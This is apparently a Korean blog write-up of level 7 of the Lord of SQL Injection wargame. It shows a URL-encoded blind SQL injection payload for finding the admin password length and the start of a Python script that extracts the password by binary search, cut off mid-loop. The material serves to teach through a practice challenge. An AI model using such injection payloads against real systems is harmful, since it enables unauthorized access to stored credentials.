[LOS] Lord of SQLinjection 7번
·
Play/wargame
- ()필터링 - 그냥 참고로 말하자면 ()는 %28 %29 - URL에 && 입력하니 씹힘 > %26 - URL에 #입력하니 무시당하길래 %23사용 ?pw='||id='admin'%26%26length(pw)=1%23 pw길이 맞추기. 1부터 8까지 시도 length(pw)=8 이제 코드를 짜보자. import requests url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php" cookie = {"PHPSESSID": "세션"} def pw_find(): length = 8 pw = "" for i in range(length): start_num = 1 end_num = 127 value = 64 while True..